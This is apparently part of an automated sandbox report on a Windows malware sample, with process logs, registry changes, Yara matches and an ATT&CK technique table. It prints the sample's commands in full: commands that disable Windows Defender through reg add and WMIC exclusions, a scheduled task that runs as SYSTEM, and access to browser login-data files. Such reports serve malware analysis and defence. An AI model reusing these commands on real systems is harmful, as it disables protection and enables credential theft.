                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8028 -s 356
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
                  Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1346017941.0000000004880000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                  Source: explorer.exe, 00000024.00000000.1321857063.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
                  Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E3575270 cpuid 0_2_00007FF7E3575270
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35D92DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7E35D92DC
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,18_2_00414B04
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
                  Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\ExclusionsRegistry value created: Exclusions_Extensions 1
                  Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiSpyware 1
                  Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableRoutinelyTakingAction 1
                  Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableBehaviorMonitoring 1
                  Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableOnAccessProtection 1
                  Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableScanOnRealtimeEnable 1
                  Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                  Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                  Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRawWriteNotification 1
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeRegistry value created: Exclusions_Extensions 1
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile written: C:\Windows\System32\GroupPolicy\gpt.ini
                  Source: svchost.exe, 00000010.00000002.2551531732.000001C67CF02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Files%\Windows Defender\MsMpeng.exe
                  Source: svchost.exe, 00000010.00000002.2551531732.000001C67CF02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe, type: DROPPED
                  Source: Yara matchFile source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe, type: DROPPED
                  Source: Yara matchFile source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid Accounts1
                  Windows Management Instrumentation
                  1
                  Scripting
                  1
                  Abuse Elevation Control Mechanism
                  811
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory14
                  File and Directory Discovery
                  Remote Desktop Protocol11
                  Data from Local System
                  1
                  Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Shared Modules
                  2
                  Windows Service
                  1
                  Bypass User Account Control
                  1
                  Abuse Elevation Control Mechanism
                  Security Account Manager37
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Exploitation for Client Execution
                  11
                  Scheduled Task/Job
                  1
                  Access Token Manipulation
                  3
                  Obfuscated Files or Information
                  NTDS1
                  Query Registry
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts11
                  Command and Scripting Interpreter
                  2
                  Registry Run Keys / Startup Folder
                  2
                  Windows Service
                  11
                  Software Packing
                  LSA Secrets951
                  Security Software Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable Media11
                  Scheduled Task/Job
                  RC Scripts712
